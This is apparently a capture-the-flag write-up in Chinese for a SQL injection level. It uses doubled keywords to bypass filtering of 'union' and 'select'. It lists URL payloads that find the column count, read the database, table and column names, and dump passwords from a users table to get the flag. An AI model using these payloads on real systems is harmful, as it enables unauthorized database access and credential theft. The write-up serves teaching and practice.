过滤了union和select,考虑用双写绕过。
判断注入点:
判断列数order by:
/?q=1'%20order%20by%204%20%23
明确了列数为3列。
判断回显位:
/?q=1'%20uniounionn%20selecselectt%201,2,3%20%23
开始判断库名:
/?q=1'%20uniounionn%20selecselectt%20database(),2,3%20%23
得到level3库。
判断表名:
/?q=1'%20uniounionn%20selecselectt%20(selecselectt%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),2,3%20%23
得到users表。
判断列名:
/?q=1'%20uniounionn%20selecselectt%20(selecselectt%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'),2,3%20%23
查询字段:
/?q=1'%20uniounionn%20selecselectt%20(selecselectt%20group_concat(password)%20from%20users),2,3%20%23
得到flag{45fe4da0bbdecf06c10b5b070c1fb9fd}
也可以:
/?q=1'uniunionon%20seleselectct%201,username,password%20from%20users%20%23